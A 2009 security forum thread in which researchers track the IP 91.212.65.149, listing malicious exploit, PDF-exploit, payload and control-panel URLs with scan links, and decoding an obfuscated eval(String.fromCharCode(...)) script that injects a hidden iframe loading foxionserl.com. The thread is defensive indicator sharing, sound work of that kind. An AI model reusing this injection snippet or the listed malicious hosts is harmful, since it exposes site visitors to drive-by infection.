« previous next »
Pages: [1]   Go Down

Author Topic: 91.212.65.149  (Read 18925 times)

0 Members and 1 Guest are viewing this topic.

May 14, 2009, 09:52:10 am
Read 18925 times

GmG

  • Special Members
  • Full Member
  • Offline
  • *
  • 92
91.212.65.149
Exploit
Code: [Select]
http://copyolist.com/image/index.php
wepawet Invalid hostname.

PDF exploit
Code: [Select]
http://copyolist.com/image/pfgt.php
http://wepawet.iseclab.org/view.php?hash=f0d46450ad8c1b4ea1d3e0e18d7bb0a5&type=js

EXE
Code: [Select]
http://copyolist.com/image/qaze.php
http://www.virustotal.com/it/analisis/f64675ceb6f39cd1c20838f94ec3fcd5
Logged
May 14, 2009, 10:01:45 am
Reply #1

SysAdMini

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 3335
Re: 91.212.65.149
control panel
Code: [Select]
copyolist.com/image/admin.php
Logged
Ruining the bad guy's day
May 30, 2009, 12:27:36 am
Reply #2

MysteryFCM

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Re: 91.212.65.149
foxionserl.com

Ref:
http://vurl.mysteryfcm.co.uk/?url=642592

Code is at the bottom of the source;

Code: [Select]
eval(String.fromCharCode(118,97,114,32,120,101,119,61,57,56,55,49,51,49,49,59,118,97,114,32,103,104,103,52,53,61,34,102,111,120,105,34,59,118,97,114,32,119,61,34,111,110,34,59,118,97,114,32,114,101,54,61,34,115,101,114,108,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,100,40,41,123,118,97,114,32,115,61,52,51,52,53,59,125,32,118,97,114,32,114,114,101,61,56,56,50,56,51,56,50))
Which decodes to;

Code: [Select]
var xew=9871311;var ghg45="foxi";var w="on";var re6="serl.";var h2h="com";var a="ifr";var s="htt";document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'rame>'); function d(){var s=4345;} var rre=8828382
Final;

Code: [Select]
<iframe src="http://foxionserl.com/" width="1" height="3"></iframe>
Strangely, foxionserl.com is returning a 200 status, but no content (headers show content length = 0)
Logged
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
May 30, 2009, 06:28:37 am
Reply #3

SysAdMini

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 3335
Re: 91.212.65.149
contains an inframe directing to pfgt.php only once.
second attempt returns an empty reponse
Code: [Select]
foxionserl.com
pdf exploit
Code: [Select]
foxionserl.com/image/pfgt.phphttp://www.virustotal.com/analisis/7c9c6d59b0111d75ed91ccc9ee997233e61c0eccefd9d0d5913de79dd209d698-1243664730 15/40

payload
Code: [Select]
foxionserl.com/image/qaze.phphttp://www.virustotal.com/analisis/773ee15ec732b67ce656c47a7914db6842241efd825fa0275dcea56d6df7d545-1243664549 6/40

AdPack control panel
Code: [Select]
foxionserl.com/image/admin.php
Logged
Ruining the bad guy's day
May 30, 2009, 12:59:45 pm
Reply #4

MysteryFCM

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Re: 91.212.65.149
Nice one, cheers :)
Logged
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net
Pages: [1]   Go Up
« previous next »